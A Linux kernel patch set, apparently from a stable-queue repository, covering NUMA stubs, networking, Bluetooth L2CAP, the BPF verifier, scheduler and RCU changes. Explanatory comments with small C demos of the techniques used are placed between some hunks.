++++ b/include/linux/numa.h
+@@ -1,6 +1,7 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+ #ifndef _LINUX_NUMA_H
+ #define _LINUX_NUMA_H
++#include <linux/init.h>
+ #include <linux/types.h>
+ 
+ #ifdef CONFIG_NODES_SHIFT
+@@ -22,34 +23,21 @@
+ #endif
+ 
+ #ifdef CONFIG_NUMA
+-#include <linux/printk.h>
+ #include <asm/sparsemem.h>
+ 
+ /* Generic implementation available */
+ int numa_map_to_online_node(int node);
+ 
+ #ifndef memory_add_physaddr_to_nid
+-static inline int memory_add_physaddr_to_nid(u64 start)
+-{
+-	pr_info_once("Unknown online node for memory at 0x%llx, assuming node 0\n",
+-			start);
+-	return 0;
+-}
++int memory_add_physaddr_to_nid(u64 start);
+ #endif
++
+ #ifndef phys_to_target_node
+-static inline int phys_to_target_node(u64 start)
+-{
+-	pr_info_once("Unknown target node for memory at 0x%llx, assuming node 0\n",
+-			start);
+-	return 0;
+-}
+-#endif
+-#ifndef numa_fill_memblks
+-static inline int __init numa_fill_memblks(u64 start, u64 end)
+-{
+-	return NUMA_NO_MEMBLK;
+-}
++int phys_to_target_node(u64 start);
+ #endif
++
++int numa_fill_memblks(u64 start, u64 end);
++
+ #else /* !CONFIG_NUMA */
+ static inline int numa_map_to_online_node(int node)
+ {
+diff --git a/include/linux/printk.h b/include/linux/printk.h
+index 8c81806c2e99f..b1a12916f0361 100644
+--- a/include/linux/printk.h
++++ b/include/linux/printk.h
+@@ -128,7 +128,7 @@ struct va_format {
+ #define no_printk(fmt, ...)				\
+ ({							\
+ 	if (0)						\
+-		printk(fmt, ##__VA_ARGS__);		\
++		_printk(fmt, ##__VA_ARGS__);		\
+ 	0;						\
+ })
+ 
+diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h
+index cecd3b6bebb8b..2b54662048882 100644
+--- a/include/linux/skbuff.h
++++ b/include/linux/skbuff.h
+@@ -2636,15 +2636,26 @@ void *skb_pull_data(struct sk_buff *skb, size_t len);
+ 
+ void *__pskb_pull_tail(struct sk_buff *skb, int delta);
+ 
+-static inline bool pskb_may_pull(struct sk_buff *skb, unsigned int len)
++static inline enum skb_drop_reason
++pskb_may_pull_reason(struct sk_buff *skb, unsigned int len)
+ {
+ 	DEBUG_NET_WARN_ON_ONCE(len > INT_MAX);
+ 
+ 	if (likely(len <= skb_headlen(skb)))
+-		return true;
++		return SKB_NOT_DROPPED_YET;
++
+ 	if (unlikely(len > skb->len))
+-		return false;
+-	return __pskb_pull_tail(skb, len - skb_headlen(skb)) != NULL;
++		return SKB_DROP_REASON_PKT_TOO_SMALL;
++
++	if (unlikely(!__pskb_pull_tail(skb, len - skb_headlen(skb))))
++		return SKB_DROP_REASON_NOMEM;
++
++	return SKB_NOT_DROPPED_YET;
++}
++
++static inline bool pskb_may_pull(struct sk_buff *skb, unsigned int len)
++{
++	return pskb_may_pull_reason(skb, len) == SKB_NOT_DROPPED_YET;
+ }
+ 
+ static inline void *pskb_pull(struct sk_buff *skb, unsigned int len)
+diff --git a/include/media/cec.h b/include/media/cec.h
+index 9c007f83569aa..ffd17371302ca 100644
+--- a/include/media/cec.h
++++ b/include/media/cec.h
+@@ -247,6 +247,7 @@ struct cec_adapter {
+ 	u16 phys_addr;
+ 	bool needs_hpd;
+ 	bool is_enabled;
++	bool is_claiming_log_addrs;
+ 	bool is_configuring;
+ 	bool must_reconfigure;
+ 	bool is_configured;
+diff --git a/include/net/ax25.h b/include/net/ax25.h
+index f8cf3629a4193..1d55e8ee08b4f 100644
+--- a/include/net/ax25.h
++++ b/include/net/ax25.h
+@@ -216,7 +216,7 @@ typedef struct {
+ struct ctl_table;
+ 
+ typedef struct ax25_dev {
+-	struct ax25_dev		*next;
++	struct list_head	list;
+ 
+ 	struct net_device	*dev;
+ 	netdevice_tracker	dev_tracker;
+@@ -333,7 +333,6 @@ int ax25_addr_size(const ax25_digi *);
+ void ax25_digi_invert(const ax25_digi *, ax25_digi *);
+ 
+ /* ax25_dev.c */
+-extern ax25_dev *ax25_dev_list;
+ extern spinlock_t ax25_dev_lock;
+ 
+ #if IS_ENABLED(CONFIG_AX25)
+diff --git a/include/net/bluetooth/bluetooth.h b/include/net/bluetooth/bluetooth.h
+index 5aaf7d7f3c6fa..c7f1dd34ea470 100644
+--- a/include/net/bluetooth/bluetooth.h
++++ b/include/net/bluetooth/bluetooth.h
+@@ -383,6 +383,8 @@ int  bt_sock_register(int proto, const struct net_proto_family *ops);
+ void bt_sock_unregister(int proto);
+ void bt_sock_link(struct bt_sock_list *l, struct sock *s);
+ void bt_sock_unlink(struct bt_sock_list *l, struct sock *s);
++struct sock *bt_sock_alloc(struct net *net, struct socket *sock,
++			   struct proto *prot, int proto, gfp_t prio, int kern);
+ int  bt_sock_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 		     int flags);
+ int  bt_sock_stream_recvmsg(struct socket *sock, struct msghdr *msg,
+diff --git a/include/net/bluetooth/l2cap.h b/include/net/bluetooth/l2cap.h
+index 2f766e3437ce2..d46f1335cf9ac 100644
+--- a/include/net/bluetooth/l2cap.h
++++ b/include/net/bluetooth/l2cap.h
+@@ -584,6 +584,9 @@ struct l2cap_chan {
+ 	__u16		tx_credits;
+ 	__u16		rx_credits;
+ 
++	/* estimated available receive buffer space or -1 if unknown */
++	ssize_t		rx_avail;
++
+ 	__u8		tx_state;
+ 	__u8		rx_state;
+ 
+@@ -724,10 +727,15 @@ struct l2cap_user {
+ /* ----- L2CAP socket info ----- */
+ #define l2cap_pi(sk) ((struct l2cap_pinfo *) sk)
+ 
++struct l2cap_rx_busy {
++	struct list_head	list;
++	struct sk_buff		*skb;
++};
++
+ struct l2cap_pinfo {
+ 	struct bt_sock		bt;
+ 	struct l2cap_chan	*chan;
+-	struct sk_buff		*rx_busy_skb;
++	struct list_head	rx_busy;
+ };
+ 
+ enum {
+@@ -985,6 +993,7 @@ int l2cap_chan_connect(struct l2cap_chan *chan, __le16 psm, u16 cid,
+ int l2cap_chan_reconfigure(struct l2cap_chan *chan, __u16 mtu);
+ int l2cap_chan_send(struct l2cap_chan *chan, struct msghdr *msg, size_t len);
+ void l2cap_chan_busy(struct l2cap_chan *chan, int busy);
++void l2cap_chan_rx_avail(struct l2cap_chan *chan, ssize_t rx_avail);
+ int l2cap_chan_check_security(struct l2cap_chan *chan, bool initiator);
+ void l2cap_chan_set_defaults(struct l2cap_chan *chan);
+ int l2cap_ertm_init(struct l2cap_chan *chan);
+diff --git a/include/net/inet6_hashtables.h b/include/net/inet6_hashtables.h
+index 56f1286583d3c..f89320b6fee31 100644
+--- a/include/net/inet6_hashtables.h
++++ b/include/net/inet6_hashtables.h
+@@ -48,6 +48,22 @@ struct sock *__inet6_lookup_established(struct net *net,
+ 					const u16 hnum, const int dif,
+ 					const int sdif);
+ 
++typedef u32 (inet6_ehashfn_t)(const struct net *net,
++			       const struct in6_addr *laddr, const u16 lport,
++			       const struct in6_addr *faddr, const __be16 fport);
++
++inet6_ehashfn_t inet6_ehashfn;
++
++INDIRECT_CALLABLE_DECLARE(inet6_ehashfn_t udp6_ehashfn);
++
++struct sock *inet6_lookup_reuseport(struct net *net, struct sock *sk,
++				    struct sk_buff *skb, int doff,
++				    const struct in6_addr *saddr,
++				    __be16 sport,
++				    const struct in6_addr *daddr,
++				    unsigned short hnum,
++				    inet6_ehashfn_t *ehashfn);
++
+ struct sock *inet6_lookup_listener(struct net *net,
+ 				   struct inet_hashinfo *hashinfo,
+ 				   struct sk_buff *skb, int doff,
+diff --git a/include/net/inet_common.h b/include/net/inet_common.h
+index 4673bbfd2811f..a75333342c4ec 100644
+--- a/include/net/inet_common.h
++++ b/include/net/inet_common.h
+@@ -31,6 +31,8 @@ int inet_dgram_connect(struct socket *sock, struct sockaddr *uaddr,
+ 		       int addr_len, int flags);
+ int inet_accept(struct socket *sock, struct socket *newsock, int flags,
+ 		bool kern);
++void __inet_accept(struct socket *sock, struct socket *newsock,
++		   struct sock *newsk);
+ int inet_send_prepare(struct sock *sk);
+ int inet_sendmsg(struct socket *sock, struct msghdr *msg, size_t size);
+ void inet_splice_eof(struct socket *sock);
+diff --git a/include/net/inet_hashtables.h b/include/net/inet_hashtables.h
+index 99bd823e97f62..ddfa2e67fdb51 100644
+--- a/include/net/inet_hashtables.h
++++ b/include/net/inet_hashtables.h
+@@ -379,6 +379,20 @@ struct sock *__inet_lookup_established(struct net *net,
+ 				       const __be32 daddr, const u16 hnum,
+ 				       const int dif, const int sdif);
+ 
++typedef u32 (inet_ehashfn_t)(const struct net *net,
++			      const __be32 laddr, const __u16 lport,
++			      const __be32 faddr, const __be16 fport);
++
++inet_ehashfn_t inet_ehashfn;
++
++INDIRECT_CALLABLE_DECLARE(inet_ehashfn_t udp_ehashfn);
++
++struct sock *inet_lookup_reuseport(struct net *net, struct sock *sk,
++				   struct sk_buff *skb, int doff,
++				   __be32 saddr, __be16 sport,
++				   __be32 daddr, unsigned short hnum,
++				   inet_ehashfn_t *ehashfn);
++
+ static inline struct sock *
+ 	inet_lookup_established(struct net *net, struct inet_hashinfo *hashinfo,
+ 				const __be32 saddr, const __be16 sport,
+@@ -448,10 +462,6 @@ static inline struct sock *__inet_lookup_skb(struct inet_hashinfo *hashinfo,
+ 			     refcounted);
+ }
+ 
+-u32 inet6_ehashfn(const struct net *net,
+-		  const struct in6_addr *laddr, const u16 lport,
+-		  const struct in6_addr *faddr, const __be16 fport);
+-
+ static inline void sk_daddr_set(struct sock *sk, __be32 addr)
+ {
+ 	sk->sk_daddr = addr; /* alias of inet_daddr */
+diff --git a/include/net/mac80211.h b/include/net/mac80211.h
+index 43173204d6d5e..87a4f334c22a8 100644
+--- a/include/net/mac80211.h
++++ b/include/net/mac80211.h
+@@ -885,6 +885,8 @@ enum mac80211_tx_info_flags {
+  *	of their QoS TID or other priority field values.
+  * @IEEE80211_TX_CTRL_MCAST_MLO_FIRST_TX: first MLO TX, used mostly internally
+  *	for sequence number assignment
++ * @IEEE80211_TX_CTRL_SCAN_TX: Indicates that this frame is transmitted
++ *	due to scanning, not in normal operation on the interface.
+  * @IEEE80211_TX_CTRL_MLO_LINK: If not @IEEE80211_LINK_UNSPECIFIED, this
+  *	frame should be transmitted on the specific link. This really is
+  *	only relevant for frames that do not have data present, and is
+@@ -905,6 +907,7 @@ enum mac80211_tx_control_flags {
+ 	IEEE80211_TX_CTRL_NO_SEQNO		= BIT(7),
+ 	IEEE80211_TX_CTRL_DONT_REORDER		= BIT(8),
+ 	IEEE80211_TX_CTRL_MCAST_MLO_FIRST_TX	= BIT(9),
++	IEEE80211_TX_CTRL_SCAN_TX		= BIT(10),
+ 	IEEE80211_TX_CTRL_MLO_LINK		= 0xf0000000,
+ };
+ 
+diff --git a/include/net/netfilter/nf_tables_core.h b/include/net/netfilter/nf_tables_core.h
+index 1223af68cd9a4..990c3767a3509 100644
+--- a/include/net/netfilter/nf_tables_core.h
++++ b/include/net/netfilter/nf_tables_core.h
+@@ -66,16 +66,6 @@ struct nft_payload {
+ 	u8			dreg;
+ };
+ 
+-struct nft_payload_set {
+-	enum nft_payload_bases	base:8;
+-	u8			offset;
+-	u8			len;
+-	u8			sreg;
+-	u8			csum_type;
+-	u8			csum_offset;
+-	u8			csum_flags;
+-};
+-
+ extern const struct nft_expr_ops nft_payload_fast_ops;
+ 
+ extern const struct nft_expr_ops nft_bitwise_fast_ops;
+diff --git a/include/trace/events/asoc.h b/include/trace/events/asoc.h
+index 4d8ef71090af1..97a434d021356 100644
+--- a/include/trace/events/asoc.h
++++ b/include/trace/events/asoc.h
+@@ -12,6 +12,8 @@
+ #define DAPM_DIRECT "(direct)"
+ #define DAPM_ARROW(dir) (((dir) == SND_SOC_DAPM_DIR_OUT) ? "->" : "<-")
+ 
++TRACE_DEFINE_ENUM(SND_SOC_DAPM_DIR_OUT);
++
+ struct snd_soc_jack;
+ struct snd_soc_card;
+ struct snd_soc_dapm_widget;
+diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h
+index d5d2183730b9f..a17688011440e 100644
+--- a/include/uapi/linux/bpf.h
++++ b/include/uapi/linux/bpf.h
+@@ -6730,7 +6730,7 @@ struct bpf_fib_lookup {
+ 
+ 		/* output: MTU value */
+ 		__u16	mtu_result;
+-	};
++	} __attribute__((packed, aligned(2)));
+ 	/* input: L3 device index for lookup
+ 	 * output: device index from FIB lookup
+ 	 */
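
The hunk above caps the union's alignment so the surrounding UAPI struct keeps a stable layout: __attribute__((packed, aligned(2))) forces the member to 2-byte alignment instead of the natural 4-byte alignment its __u32 member would otherwise impose. A minimal stand-alone sketch of the effect (struct names invented for illustration, not the real bpf_fib_lookup layout):

#include <stdio.h>
#include <stddef.h>

/* Hypothetical layout demo, not the real UAPI struct. */
struct demo_natural {
	unsigned short a;
	union { unsigned int tbid; unsigned short mtu; } u;	/* 4-byte aligned */
};

struct demo_packed {
	unsigned short a;
	union { unsigned int tbid; unsigned short mtu; }
		__attribute__((packed, aligned(2))) u;		/* 2-byte aligned */
};

int main(void)
{
	/* The natural union forces 2 bytes of padding after 'a';
	 * the packed/aligned(2) union starts right at offset 2. */
	printf("natural: offset=%zu size=%zu\n",
	       offsetof(struct demo_natural, u), sizeof(struct demo_natural));
	printf("packed:  offset=%zu size=%zu\n",
	       offsetof(struct demo_packed, u), sizeof(struct demo_packed));
	return 0;
}
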
+diff --git a/io_uring/io_uring.h b/io_uring/io_uring.h
+index 59e6f755f12c6..0cafdefce02dc 100644
+--- a/io_uring/io_uring.h
++++ b/io_uring/io_uring.h
+@@ -275,8 +275,7 @@ static inline int io_run_task_work(void)
+ 
+ static inline bool io_task_work_pending(struct io_ring_ctx *ctx)
+ {
+-	return test_thread_flag(TIF_NOTIFY_SIGNAL) ||
+-		!wq_list_empty(&ctx->work_llist);
++	return task_work_pending(current) || !llist_empty(&ctx->work_llist);
+ }
+ 
+ static inline int io_run_task_work_ctx(struct io_ring_ctx *ctx)
+diff --git a/io_uring/nop.c b/io_uring/nop.c
+index d956599a3c1b8..1a4e312dfe510 100644
+--- a/io_uring/nop.c
++++ b/io_uring/nop.c
+@@ -12,6 +12,8 @@
+ 
+ int io_nop_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ {
++	if (READ_ONCE(sqe->rw_flags))
++		return -EINVAL;
+ 	return 0;
+ }
+ 
+diff --git a/kernel/Makefile b/kernel/Makefile
+index ebc692242b68b..c90ee75eb8043 100644
+--- a/kernel/Makefile
++++ b/kernel/Makefile
+@@ -112,6 +112,7 @@ obj-$(CONFIG_SHADOW_CALL_STACK) += scs.o
+ obj-$(CONFIG_HAVE_STATIC_CALL) += static_call.o
+ obj-$(CONFIG_HAVE_STATIC_CALL_INLINE) += static_call_inline.o
+ obj-$(CONFIG_CFI_CLANG) += cfi.o
++obj-$(CONFIG_NUMA) += numa.o
+ 
+ obj-$(CONFIG_PERF_EVENTS) += events/
+ 
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 18b3f429abe17..1d851e2f48590 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -6492,7 +6492,8 @@ static bool may_update_sockmap(struct bpf_verifier_env *env, int func_id)
+ 	enum bpf_attach_type eatype = env->prog->expected_attach_type;
+ 	enum bpf_prog_type type = resolve_prog_type(env->prog);
+ 
+-	if (func_id != BPF_FUNC_map_update_elem)
++	if (func_id != BPF_FUNC_map_update_elem &&
++	    func_id != BPF_FUNC_map_delete_elem)
+ 		return false;
+ 
+ 	/* It's not possible to get access to a locked struct sock in these
+@@ -6503,6 +6504,11 @@ static bool may_update_sockmap(struct bpf_verifier_env *env, int func_id)
+ 		if (eatype == BPF_TRACE_ITER)
+ 			return true;
+ 		break;
++	case BPF_PROG_TYPE_SOCK_OPS:
++		/* map_update allowed only via dedicated helpers with event type checks */
++		if (func_id == BPF_FUNC_map_delete_elem)
++			return true;
++		break;
+ 	case BPF_PROG_TYPE_SOCKET_FILTER:
+ 	case BPF_PROG_TYPE_SCHED_CLS:
+ 	case BPF_PROG_TYPE_SCHED_ACT:
+@@ -6598,7 +6604,6 @@ static int check_map_func_compatibility(struct bpf_verifier_env *env,
+ 	case BPF_MAP_TYPE_SOCKMAP:
+ 		if (func_id != BPF_FUNC_sk_redirect_map &&
+ 		    func_id != BPF_FUNC_sock_map_update &&
+-		    func_id != BPF_FUNC_map_delete_elem &&
+ 		    func_id != BPF_FUNC_msg_redirect_map &&
+ 		    func_id != BPF_FUNC_sk_select_reuseport &&
+ 		    func_id != BPF_FUNC_map_lookup_elem &&
+@@ -6608,7 +6613,6 @@ static int check_map_func_compatibility(struct bpf_verifier_env *env,
+ 	case BPF_MAP_TYPE_SOCKHASH:
+ 		if (func_id != BPF_FUNC_sk_redirect_hash &&
+ 		    func_id != BPF_FUNC_sock_hash_update &&
+-		    func_id != BPF_FUNC_map_delete_elem &&
+ 		    func_id != BPF_FUNC_msg_redirect_hash &&
+ 		    func_id != BPF_FUNC_sk_select_reuseport &&
+ 		    func_id != BPF_FUNC_map_lookup_elem &&
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index 79e6a5d4c29a1..01f5a019e0f54 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -2185,7 +2185,7 @@ bool current_cpuset_is_being_rebound(void)
+ static int update_relax_domain_level(struct cpuset *cs, s64 val)
+ {
+ #ifdef CONFIG_SMP
+-	if (val < -1 || val >= sched_domain_level_max)
++	if (val < -1 || val > sched_domain_level_max + 1)
+ 		return -EINVAL;
+ #endif
+ 
+diff --git a/kernel/dma/map_benchmark.c b/kernel/dma/map_benchmark.c
+index 0520a8f4fb1df..af661734e8f90 100644
+--- a/kernel/dma/map_benchmark.c
++++ b/kernel/dma/map_benchmark.c
+@@ -101,7 +101,6 @@ static int do_map_benchmark(struct map_benchmark_data *map)
+ 	struct task_struct **tsk;
+ 	int threads = map->bparam.threads;
+ 	int node = map->bparam.node;
+-	const cpumask_t *cpu_mask = cpumask_of_node(node);
+ 	u64 loops;
+ 	int ret = 0;
+ 	int i;
+@@ -122,7 +121,7 @@ static int do_map_benchmark(struct map_benchmark_data *map)
+ 		}
+ 
+ 		if (node != NUMA_NO_NODE)
+-			kthread_bind_mask(tsk[i], cpu_mask);
++			kthread_bind_mask(tsk[i], cpumask_of_node(node));
+ 	}
+ 
+ 	/* clear the old value in the previous benchmark */
+@@ -208,7 +207,8 @@ static long map_benchmark_ioctl(struct file *file, unsigned int cmd,
+ 		}
+ 
+ 		if (map->bparam.node != NUMA_NO_NODE &&
+-		    !node_possible(map->bparam.node)) {
++		    (map->bparam.node < 0 || map->bparam.node >= MAX_NUMNODES ||
++		     !node_possible(map->bparam.node))) {
+ 			pr_err("invalid numa node\n");
+ 			return -EINVAL;
+ 		}
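
node_possible() ultimately indexes a fixed-size node bitmap, so a user-supplied node id must be range-checked before the bitmap test, which is exactly what the added condition does. A stand-alone sketch of the validate-before-index pattern (MAX_NODES and the bitmap are illustrative stand-ins):

#include <stdbool.h>
#include <stdio.h>

#define MAX_NODES 64
static unsigned long long possible_map = 0x3;	/* nodes 0 and 1 exist */

/* Reject out-of-range ids *before* using them as a bit index. */
static bool node_valid(long node)
{
	if (node < 0 || node >= MAX_NODES)
		return false;
	return possible_map & (1ULL << node);
}

int main(void)
{
	printf("%d %d %d\n", node_valid(1), node_valid(7), node_valid(1000));
	return 0;
}
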
+diff --git a/kernel/irq/cpuhotplug.c b/kernel/irq/cpuhotplug.c
+index 1ed2b1739363b..5ecd072a34fe7 100644
+--- a/kernel/irq/cpuhotplug.c
++++ b/kernel/irq/cpuhotplug.c
+@@ -69,6 +69,14 @@ static bool migrate_one_irq(struct irq_desc *desc)
+ 		return false;
+ 	}
+ 
++	/*
++	 * Complete a possibly pending irq move cleanup. If this
++	 * interrupt was moved in hard irq context, then the vectors need
++	 * to be cleaned up; the cleanup cannot wait until this interrupt
++	 * actually fires with this CPU involved.
++	 */
++	irq_force_complete_move(desc);
++
+ 	/*
+ 	 * No move required, if:
+ 	 * - Interrupt is per cpu
+@@ -87,14 +95,6 @@ static bool migrate_one_irq(struct irq_desc *desc)
+ 		return false;
+ 	}
+ 
+-	/*
+-	 * Complete an eventually pending irq move cleanup. If this
+-	 * interrupt was moved in hard irq context, then the vectors need
+-	 * to be cleaned up. It can't wait until this interrupt actually
+-	 * happens and this CPU was involved.
+-	 */
+-	irq_force_complete_move(desc);
+-
+ 	/*
+ 	 * If there is a setaffinity pending, then try to reuse the pending
+ 	 * mask, so the last change of the affinity does not get lost. If
+diff --git a/kernel/numa.c b/kernel/numa.c
+new file mode 100644
+index 0000000000000..67ca6b8585c06
+--- /dev/null
++++ b/kernel/numa.c
+@@ -0,0 +1,26 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++
++#include <linux/printk.h>
++#include <linux/numa.h>
++
++/* Stub functions: */
++
++#ifndef memory_add_physaddr_to_nid
++int memory_add_physaddr_to_nid(u64 start)
++{
++	pr_info_once("Unknown online node for memory at 0x%llx, assuming node 0\n",
++			start);
++	return 0;
++}
++EXPORT_SYMBOL_GPL(memory_add_physaddr_to_nid);
++#endif
++
++#ifndef phys_to_target_node
++int phys_to_target_node(u64 start)
++{
++	pr_info_once("Unknown target node for memory at 0x%llx, assuming node 0\n",
++			start);
++	return 0;
++}
++EXPORT_SYMBOL_GPL(phys_to_target_node);
++#endif
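
The new kernel/numa.c relies on a common kernel idiom: the generic fallback is compiled only when an architecture has not provided its own implementation, which the arch signals by defining a macro with the function's name in its headers. A compressed, compilable illustration of the mechanism (all names invented for the example):

#include <stdio.h>

/* "Arch" side (hypothetical): provide an override and mark it. */
static inline int arch_phys_to_node(unsigned long long addr)
{
	return (int)(addr >> 32);	/* arch-specific mapping */
}
#define phys_to_target_node arch_phys_to_node

/* Generic side: compile the stub only when no override exists. */
#ifndef phys_to_target_node
static int phys_to_target_node(unsigned long long addr)
{
	return 0;			/* fallback: everything on node 0 */
}
#endif

int main(void)
{
	printf("%d\n", phys_to_target_node(0x200000000ULL));	/* prints 2 */
	return 0;
}
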
+diff --git a/kernel/rcu/tasks.h b/kernel/rcu/tasks.h
+index b5d5b6cf093a7..6f48f565e3acb 100644
+--- a/kernel/rcu/tasks.h
++++ b/kernel/rcu/tasks.h
+@@ -1789,7 +1789,7 @@ void show_rcu_tasks_trace_gp_kthread(void)
+ {
+ 	char buf[64];
+ 
+-	sprintf(buf, "N%lu h:%lu/%lu/%lu",
++	snprintf(buf, sizeof(buf), "N%lu h:%lu/%lu/%lu",
+ 		data_race(n_trc_holdouts),
+ 		data_race(n_heavy_reader_ofl_updates),
+ 		data_race(n_heavy_reader_updates),
+diff --git a/kernel/rcu/tree_stall.h b/kernel/rcu/tree_stall.h
+index 7d15b5b5a235a..11a82404a6cee 100644
+--- a/kernel/rcu/tree_stall.h
++++ b/kernel/rcu/tree_stall.h
+@@ -474,7 +474,8 @@ static void print_cpu_stall_info(int cpu)
+ 			rcu_dynticks_in_eqs(rcu_dynticks_snap(cpu));
+ 	rcuc_starved = rcu_is_rcuc_kthread_starving(rdp, &j);
+ 	if (rcuc_starved)
+-		sprintf(buf, " rcuc=%ld jiffies(starved)", j);
++		// Print signed value, as negative values indicate a probable bug.
++		snprintf(buf, sizeof(buf), " rcuc=%ld jiffies(starved)", j);
+ 	pr_err("\t%d-%c%c%c%c: (%lu %s) idle=%04x/%ld/%#lx softirq=%u/%u fqs=%ld%s%s\n",
+ 	       cpu,
+ 	       "O."[!!cpu_online(cpu)],
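
Both RCU hunks swap sprintf() for snprintf() so the stack buffer can never be overrun even if the formatted counters grow wider than expected: snprintf() truncates and still NUL-terminates, and its return value reveals the truncation. A two-call demonstration:

#include <stdio.h>

int main(void)
{
	char buf[8];

	/* snprintf() never writes past sizeof(buf) and always
	 * NUL-terminates; the return value is the length that
	 * *would* have been written, so truncation is detectable. */
	int n = snprintf(buf, sizeof(buf), "N%lu h:%lu", 12345UL, 67890UL);

	printf("wanted %d bytes, kept \"%s\"\n", n, buf);
	return 0;
}
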
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index 18a4f8f28a25f..d71234729edb4 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -11117,7 +11117,7 @@ static ssize_t cpu_max_write(struct kernfs_open_file *of,
+ {
+ 	struct task_group *tg = css_tg(of_css(of));
+ 	u64 period = tg_get_cfs_period(tg);
+-	u64 burst = tg_get_cfs_burst(tg);
++	u64 burst = tg->cfs_bandwidth.burst;
+ 	u64 quota;
+ 	int ret;
+ 
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index 91c101ecfef9f..0de8354d5ad0a 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -6020,22 +6020,42 @@ static inline void hrtick_update(struct rq *rq)
+ #ifdef CONFIG_SMP
+ static inline bool cpu_overutilized(int cpu)
+ {
+-	unsigned long rq_util_min = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MIN);
+-	unsigned long rq_util_max = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MAX);
++	unsigned long  rq_util_min, rq_util_max;
++
++	if (!sched_energy_enabled())
++		return false;
++
++	rq_util_min = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MIN);
++	rq_util_max = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MAX);
+ 
+ 	/* Return true only if the utilization doesn't fit CPU's capacity */
+ 	return !util_fits_cpu(cpu_util_cfs(cpu), rq_util_min, rq_util_max, cpu);
+ }
+ 
+-static inline void update_overutilized_status(struct rq *rq)
++static inline void set_rd_overutilized_status(struct root_domain *rd,
++					      unsigned int status)
+ {
+-	if (!READ_ONCE(rq->rd->overutilized) && cpu_overutilized(rq->cpu)) {
+-		WRITE_ONCE(rq->rd->overutilized, SG_OVERUTILIZED);
+-		trace_sched_overutilized_tp(rq->rd, SG_OVERUTILIZED);
+-	}
++	if (!sched_energy_enabled())
++		return;
++
++	WRITE_ONCE(rd->overutilized, status);
++	trace_sched_overutilized_tp(rd, !!status);
++}
++
++static inline void check_update_overutilized_status(struct rq *rq)
++{
++	/*
++	 * The overutilized field is used for load-balancing decisions only
++	 * if the energy-aware scheduler is in use.
++	 */
++	if (!sched_energy_enabled())
++		return;
++
++	if (!READ_ONCE(rq->rd->overutilized) && cpu_overutilized(rq->cpu))
++		set_rd_overutilized_status(rq->rd, SG_OVERUTILIZED);
+ }
+ #else
+-static inline void update_overutilized_status(struct rq *rq) { }
++static inline void check_update_overutilized_status(struct rq *rq) { }
+ #endif
+ 
+ /* Runqueue only has SCHED_IDLE tasks enqueued */
+@@ -6147,7 +6167,7 @@ enqueue_task_fair(struct rq *rq, struct task_struct *p, int flags)
+ 	 * and the following generally works well enough in practice.
+ 	 */
+ 	if (!task_new)
+-		update_overutilized_status(rq);
++		check_update_overutilized_status(rq);
+ 
+ enqueue_throttle:
+ 	assert_list_leaf_cfs_rq(rq);
+@@ -9923,19 +9943,14 @@ static inline void update_sd_lb_stats(struct lb_env *env, struct sd_lb_stats *sd
+ 		env->fbq_type = fbq_classify_group(&sds->busiest_stat);
+ 
+ 	if (!env->sd->parent) {
+-		struct root_domain *rd = env->dst_rq->rd;
+-
+ 		/* update overload indicator if we are at root domain */
+-		WRITE_ONCE(rd->overload, sg_status & SG_OVERLOAD);
++		WRITE_ONCE(env->dst_rq->rd->overload, sg_status & SG_OVERLOAD);
+ 
+ 		/* Update over-utilization (tipping point, U >= 0) indicator */
+-		WRITE_ONCE(rd->overutilized, sg_status & SG_OVERUTILIZED);
+-		trace_sched_overutilized_tp(rd, sg_status & SG_OVERUTILIZED);
++		set_rd_overutilized_status(env->dst_rq->rd,
++					   sg_status & SG_OVERUTILIZED);
+ 	} else if (sg_status & SG_OVERUTILIZED) {
+-		struct root_domain *rd = env->dst_rq->rd;
+-
+-		WRITE_ONCE(rd->overutilized, SG_OVERUTILIZED);
+-		trace_sched_overutilized_tp(rd, SG_OVERUTILIZED);
++		set_rd_overutilized_status(env->dst_rq->rd, SG_OVERUTILIZED);
+ 	}
+ 
+ 	update_idle_cpu_scan(env, sum_util);
+@@ -11849,7 +11864,7 @@ static void task_tick_fair(struct rq *rq, struct task_struct *curr, int queued)
+ 		task_tick_numa(rq, curr);
+ 
+ 	update_misfit_status(curr, rq);
+-	update_overutilized_status(task_rq(curr));
++	check_update_overutilized_status(task_rq(curr));
+ 
+ 	task_tick_core(rq, curr);
+ }
+diff --git a/kernel/sched/isolation.c b/kernel/sched/isolation.c
+index 373d42c707bc5..82e2f7fc7c267 100644
+--- a/kernel/sched/isolation.c
++++ b/kernel/sched/isolation.c
+@@ -109,6 +109,7 @@ static void __init housekeeping_setup_type(enum hk_type type,
+ static int __init housekeeping_setup(char *str, unsigned long flags)
+ {
+ 	cpumask_var_t non_housekeeping_mask, housekeeping_staging;
++	unsigned int first_cpu;
+ 	int err = 0;
+ 
+ 	if ((flags & HK_FLAG_TICK) && !(housekeeping.flags & HK_FLAG_TICK)) {
+@@ -129,7 +130,8 @@ static int __init housekeeping_setup(char *str, unsigned long flags)
+ 	cpumask_andnot(housekeeping_staging,
+ 		       cpu_possible_mask, non_housekeeping_mask);
+ 
+-	if (!cpumask_intersects(cpu_present_mask, housekeeping_staging)) {
++	first_cpu = cpumask_first_and(cpu_present_mask, housekeeping_staging);
++	if (first_cpu >= nr_cpu_ids || first_cpu >= setup_max_cpus) {
+ 		__cpumask_set_cpu(smp_processor_id(), housekeeping_staging);
+ 		__cpumask_clear_cpu(smp_processor_id(), non_housekeeping_mask);
+ 		if (!housekeeping.flags) {
